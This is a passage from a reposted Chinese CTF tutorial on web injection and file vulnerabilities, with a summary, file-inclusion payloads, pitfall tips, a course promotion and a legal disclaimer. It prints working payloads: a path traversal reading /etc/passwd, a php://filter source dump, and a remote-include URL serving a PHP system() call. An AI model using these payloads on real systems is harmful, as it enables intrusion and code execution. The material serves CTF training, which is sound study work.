文章总结： 本文详解CTFWeb竞赛中高占比的注入与文件类漏洞。涵盖SQL注入、命令注入及文件上传、包含的识别方法、利用技巧与WAF绕过策略。结合真题演示了布尔盲注、htaccess绕过及伪协议读取源码等实战操作，并总结了防封IP与系统兼容性等避坑经验，为CTF选手提供了极具操作性的解题指南。 综合评分： 88 文章分类： CTF,WEB安全,漏洞分析,实战经验

（2）实操步骤（.htaccess绕过法） 2. 文件包含漏洞：读取源码，甚至RCE

文件包含分为本地文件包含（LFI） 和远程文件包含（RFI），CTF中LFI更常见。

（1）漏洞识别

测试Payload：?file=../../etc/passwd（Linux）或?file=../../windows/system32/drivers/etc/hosts（Windows）

• 若页面返回系统文件内容 → 漏洞存在！

（2）进阶利用：读取PHP源码

当服务器开启PHP时，用php://filter编码读取源码：

• Payload：?file=php://filter/read=convert.base64-encode/resource=../index.php
• 步骤：获取Base64编码内容 → 解码得到源码 → 查找flag或其他漏洞。

（3）RCE利用（远程文件包含）

若服务器开启allow_url_include=On，可远程包含恶意脚本：

• Payload：?file=http://你的服务器/evil.txt
• evil.txt内容：<?php system("cat /flag"); ?>

三、避坑清单（90%选手踩过的坑）

1. 文件上传坑：只改后缀不改文件头 → 被服务器内容检测拦截，记得加GIF89a。
2. SQL注入坑：盲注时未加延时 → 靶机IP被封禁，脚本中可加time.sleep(0.5)。
3. 命令注入坑：忽略系统差异 → Linux用ls，Windows用dir，别搞混！

四、福利+互动

如果今天这篇注入+文件漏洞的内容对你有帮助，别忘了点个赞、在看，转发给一起打CTF的兄弟~

200节攻防教程，限免领！

想要的兄弟，关注我+在后台发“学习”，直接免费分享！

咱学漏洞挖掘和CTF，光看文章不够，这套教程里全是实战演示——从工具配置到漏洞利用，每一步都手把手教，跟着练就能上手！

（注：资源领取入口在公众号后台，关注后发“学习”自动弹链接）

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：网络安全学习室 点击关注👉《漏洞挖掘实战系列（第2期）：Web专项（上） 注入类+文件类漏洞，吃透60%分值》